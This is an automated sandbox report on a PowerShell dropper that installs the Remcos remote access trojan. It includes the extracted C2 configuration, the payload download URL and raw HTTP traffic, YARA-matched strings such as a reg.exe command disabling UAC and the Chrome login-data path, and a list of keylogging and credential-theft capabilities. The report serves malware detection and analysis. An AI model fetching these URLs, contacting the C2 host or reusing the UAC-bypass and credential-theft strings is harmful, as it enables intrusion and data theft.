Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cozzy.ps1

Overview

General Information

Sample name:cozzy.ps1
Analysis ID:1638294
MD5:7e6517b0f94a6ab3065d91ff648fa8fe
SHA1:6a6931d1b7c6b56bbf5620247d2245d57ed082bf
SHA256:30e18188bc57173766d721ca1c2f148c4c1195b9d4eacc9ed67978ba7c3059b8
Tags:ps1user-TornadoAV_dev
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Powershell drops PE file
Uses dynamic DNS services
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 8168 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cozzy.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • x.exe (PID: 7332 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 59F0B75B8E40BB7D1868FE084B5CDC66)
      • RegAAsm.exe (PID: 7516 cmdline: "C:\Users\user\AppData\Local\Temp\RegAAsm.exe" MD5: D249E2B6F10508DA70305BB27BBF43E6)
  • notepad.exe (PID: 1624 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\cozzy.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["remyma.duckdns.org:52507:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7J4RV4", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_Remcos_b296e965unknownunknown
  • 0x761ea:$a1: Remcos restarted by watchdog!
  • 0x76912:$a3: %02i:%02i:%02i:%03i
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\RegAAsm.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    C:\Users\user\AppData\Local\Temp\RegAAsm.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
      C:\Users\user\AppData\Local\Temp\RegAAsm.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        C:\Users\user\AppData\Local\Temp\RegAAsm.exeWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6bd58:$a1: Remcos restarted by watchdog!
        • 0x6c3a8:$a3: %02i:%02i:%02i:%03i
        C:\Users\user\AppData\Local\Temp\RegAAsm.exeREMCOS_RAT_variantsunknownunknown
        • 0x65ff4:$str_a1: C:\Windows\System32\cmd.exe
        • 0x65f70:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x65f70:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66470:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x66ad8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x66064:$str_b2: Executing file:
        • 0x66e9c:$str_b3: GetDirectListeningPort
        • 0x668c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x66a48:$str_b7: \update.vbs
        • 0x6608c:$str_b9: Downloaded file:
        • 0x66078:$str_b10: Downloading file:
        • 0x6611c:$str_b12: Failed to upload file:
        • 0x66e64:$str_b13: StartForward
        • 0x66e84:$str_b14: StopForward
        • 0x669a0:$str_b15: fso.DeleteFile "
        • 0x66934:$str_b16: On Error Resume Next
        • 0x669d0:$str_b17: fso.DeleteFolder "
        • 0x6610c:$str_b18: Uploaded file:
        • 0x660cc:$str_b19: Unable to delete:
        • 0x66968:$str_b20: while fso.FileExists("
        • 0x665a9:$str_c0: [Firefox StoredLogins not found]
        Click to see the 1 entries
        SourceRuleDescriptionAuthorStrings
        00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x14758:$a1: Remcos restarted by watchdog!
                • 0x14da8:$a3: %02i:%02i:%02i:%03i
                Click to see the 21 entries
                SourceRuleDescriptionAuthorStrings
                4.0.RegAAsm.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  4.0.RegAAsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    4.0.RegAAsm.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      4.0.RegAAsm.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                      • 0x6bd58:$a1: Remcos restarted by watchdog!
                      • 0x6c3a8:$a3: %02i:%02i:%02i:%03i
                      4.0.RegAAsm.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                      • 0x65ff4:$str_a1: C:\Windows\System32\cmd.exe
                      • 0x65f70:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x65f70:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x66470:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                      • 0x66ad8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                      • 0x66064:$str_b2: Executing file:
                      • 0x66e9c:$str_b3: GetDirectListeningPort
                      • 0x668c8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                      • 0x66a48:$str_b7: \update.vbs
                      • 0x6608c:$str_b9: Downloaded file:
                      • 0x66078:$str_b10: Downloading file:
                      • 0x6611c:$str_b12: Failed to upload file:
                      • 0x66e64:$str_b13: StartForward
                      • 0x66e84:$str_b14: StopForward
                      • 0x669a0:$str_b15: fso.DeleteFile "
                      • 0x66934:$str_b16: On Error Resume Next
                      • 0x669d0:$str_b17: fso.DeleteFolder "
                      • 0x6610c:$str_b18: Uploaded file:
                      • 0x660cc:$str_b19: Unable to delete:
                      • 0x66968:$str_b20: while fso.FileExists("
                      • 0x665a9:$str_c0: [Firefox StoredLogins not found]
                      Click to see the 19 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cozzy.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cozzy.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1132, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cozzy.ps1", ProcessId: 8168, ProcessName: powershell.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cozzy.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cozzy.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1132, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cozzy.ps1", ProcessId: 8168, ProcessName: powershell.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Registry Key setAuthor: Joe Security: Data: Details: 26 25 82 37 90 1B 85 BD 1B BF 3F 60 76 33 60 A0 A2 A6 C1 87 8F 36 C8 01 83 6E 3D 32 E4 9E 0A 93 49 1E 5F C3 63 09 F1 62 09 ED 12 CA 1F C3 BB 09 AD 50 EC 7F 0E 66 36 FA 95 A3 6E FC 4F 37 94 85 F7 2B 32 3A 16 50 FD BE 61 89 69 8E 09 03 FC 09 6B 96 1B EA D9 5A 7A 04 69 EF DA 22 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, ProcessId: 7516, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-7J4RV4\exepath
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-14T11:10:57.953236+010020365941Malware Command and Control Activity Detected192.168.2.449718172.94.9.13252507TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-14T11:10:59.550036+010028033043Unknown Traffic192.168.2.449719178.237.33.5080TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: http://176.65.144.3/dev/cozyrem.exeAvira URL Cloud: Label: malware
                      Source: remyma.duckdns.orgAvira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeAvira: detection malicious, Label: BDS/Backdoor.Gen
                      Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/AVI.Agent.rwsyp
                      Source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["remyma.duckdns.org:52507:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7J4RV4", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeReversingLabs: Detection: 84%
                      Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 41%
                      Source: cozzy.ps1Virustotal: Detection: 27%Perma Link
                      Source: cozzy.ps1ReversingLabs: Detection: 31%
                      Source: Yara matchFile source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 7332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAAsm.exe PID: 7516, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00433B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,4_2_00433B64
                      Source: x.exe, 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_31fcaa60-9

                      Exploits

                      barindex
                      Source: Yara matchFile source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 7332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAAsm.exe PID: 7516, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED

                      Privilege Escalation

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00406ABC _wcslen,CoGetObject,4_2_00406ABC
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,4_2_004090DC
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,4_2_0040B6B5
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,4_2_0041C7E5
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,4_2_0040B8BA
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_0044E989 FindFirstFileExA,4_2_0044E989
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,4_2_00408CDE
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,4_2_00419CEE
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,4_2_00407EDD
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00406F13 FindFirstFileW,FindNextFileW,4_2_00406F13
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,4_2_00407357
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49718 -> 172.94.9.132:52507
                      Source: Malware configuration extractorURLs: remyma.duckdns.org
                      Source: unknownDNS query: name: remyma.duckdns.org
                      Source: global trafficTCP traffic: 192.168.2.4:57232 -> 162.159.36.2:53
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Mar 2025 10:10:55 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Fri, 07 Mar 2025 06:47:58 GMTETag: "79c00-62fbb00bc6380"Accept-Ranges: bytesContent-Length: 498688Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 6a c8 65 08 0b a6 36 08 0b a6 36 08 0b a6 36 bc 97 57 36 1b 0b a6 36 bc 97 55 36 a3 0b a6 36 bc 97 54 36 16 0b a6 36 01 73 22 36 09 0b a6 36 96 ab 61 36 0a 0b a6 36 5a 63 a3 37 36 0b a6 36 5a 63 a2 37 29 0b a6 36 5a 63 a5 37 12 0b a6 36 01 73 35 36 13 0b a6 36 08 0b a7 36 4f 0a a6 36 a5 62 af 37 6c 0b a6 36 a5 62 59 36 09 0b a6 36 a5 62 a4 37 09 0b a6 36 52 69 63 68 08 0b a6 36 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 2b 43 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 10 00 72 05 00 00 26 02 00 00 00 00 00 64 4d 03 00 00 10 00 00 00 90 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 08 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 01 07 00 04 01 00 00 00 80 07 00 04 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 07 00 ac 3c 00 00 70 e6 06 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 e7 06 00 18 00 00 00 a8 e6 06 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 05 00 fc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5b 71 05 00 00 10 00 00 00 72 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e6 8c 01 00 00 90 05 00 00 8e 01 00 00 76 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 5e 00 00 00 20 07 00 00 0e 00 00 00 04 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 04 4b 00 00 00 80 07 00 00 4c 00 00 00 12 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3c 00 00 00 d0 07 00 00 3e 00 00 00 5e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: GET /dev/cozyrem.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 176.65.144.3 176.65.144.3
                      Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49719 -> 178.237.33.50:80
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeCode function: 4_2_00427321 recv,4_2_00427321
                      Source: global trafficHTTP traffic detected: GET /dev/cozyrem.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
